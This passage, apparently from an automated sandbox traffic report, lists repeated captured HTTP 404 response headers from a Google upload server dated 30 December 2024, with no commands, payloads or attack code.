ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR; expires=Tue, 01-Jul-2025 10:25:28 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ysgc8OkE3gCgB6SNQVWIKeOFkKSjzMc_7x4-AQx8cfNEOsYN6ak6zGWCGq0hVhKkjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fNsdd3R6rVGNcosIYFkM8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6qGZCpKx_w7_UabhzPO8OonTbtzVI75nJI7fzXpgCc12_T9lcCF40CTH9nkLox15fDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-w-BW4zQttCedl0XdzJabag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7aFG5rdu7W40FcNCgXVkkniskiSPJWYYlRes5m1W-YERqgVXCRy0cUAiWwkPrc4_qmm7Tx_fQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-4hE7LsgGpBawIfsZ80NpEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5MvLyBwa8cpkm-cIC40TsSoimjmFTDOUmW5JeDBTBLcS-Av4CijJsAqW86510K9SvtM0KOmZ4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-3CKXsYcSHndQmAwXC3b2xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4A0sEJFeHwGe_52zzgMOsA38mO7domKpCcqJ7ek366q72KDgG6U_9Fah0051hIjw27nQv4kNEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-K63tw7EZ2mURmvhzZHAcrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45bHsJ1YtaMwu9UYCm7n4iCs5LgthaoLfe7xqmInIlKZ9oxKuP3jMDS-DGMnSBmUaGhlTY-xgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jk49jBxwmjncTB3pqeNwig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Ff6acbOuDFgK3GHZ9HNiq2Ey2S2O4SqJdufCM1UKpXHaybB3gAozCEpmup54Ly4rUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6m7IAFn-LbfP86daIHlkkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77WpdRr0e-a-hoMhmO-gNrrz7SE_10Tq-2E5_WzryIpur5RYk1VcQUq0S6dCAAcKCRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-YJwDoXf8C61veYQXXsrclw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6cqMcIpziQYzUl1gETvAmNf_9eJ063mEzoWUXHxkt8kZhkb06YFmJTTXFwSpZ661mLHPA4w6cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-jTNw9WWon9TID_7f683lZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cVaEoS_3tl8G1jRh_Pyp_DngKQPcjw_Sth9BdSegn3brRrjJ2Om3DlmcQOyvQUpfFfNCffYQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-BRUjXSBjQS6ydYsXqnDRMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7F3Tj1BTxkYXHg6yPaMFR5pwbnDv72DTeJwDAwOA9bqebLoZX_y-rLUzEmpN9My4oZ75mmSSsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pWu2O5T3Iy_-2CmlACyqjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wBVouWvJgn0JBMsI4xj29JxmtOMxj5Mlyx5o2j9nOVnrvMq8wX3Zy7eEnRED3o9s5lgYAEIwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:38 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-L14v-Mk4Sr0umRXI3Xez7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6eYygtDMd7OJlAL5iWKaMAOqTgPTxg4JGvu4SW1v6ox5ogLrZ6MWuY8K_a-avRM_26Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kpoU2ys3a3YmUyI80p8ttg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QkIM37mBp7IOigMBNoVIUWodw-vk8n2uvKNdkZ5CC4ky34pPAgrqjZ9P7hOhLSF7KVPXjV4oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-hMsL6SwbhAoPYrYRDo1uJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZB0jaLdiyFp8WTHOSWhA3_ncdd9MyI2WXWwfoqrOr6IYvEsbxgihfbPyvgE-4AsnnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-QQKWj13H8gQrbzFc2pgXbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ib9-MvF4oztS4pL0EXH7hi8o2_8x4cV7u6pm2Y_mV8UAViIxSgzImrv7BQDgOBrRKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-a1Jio3vM31uD0fKAhFkLTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7QGjL2bE-Wml6dmM8VXksBJnHqDTpfsTri2bkgX7H7HenJFvuG0cupQC4SHCP1iz4CContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ldu3Z6Suo--WkLZuKAtkPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC73ROYEnfOsssoCeaIX7NllHnpgbWsUtvv6zvQbLite4VUsWhzoy4gYke3EoHTqX9lrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9XuZB6RnSwjANqvSscnXHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7BZvxIr000ac4oRBYSqIfjdgwTQcGlMrhiR_ppJDduvYd85x_WVcAMYunfsb84AyVBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:43 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-KH4j_jFQVksWb42p8BzpiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7nEZv3EeUA8RxBAEkHdahb-SPNFRyZtxvkCjG501AD6nNpy46LNRrTrFqKprUvO2LyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-DgR8KjNPMrrfFrBC-wzIgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
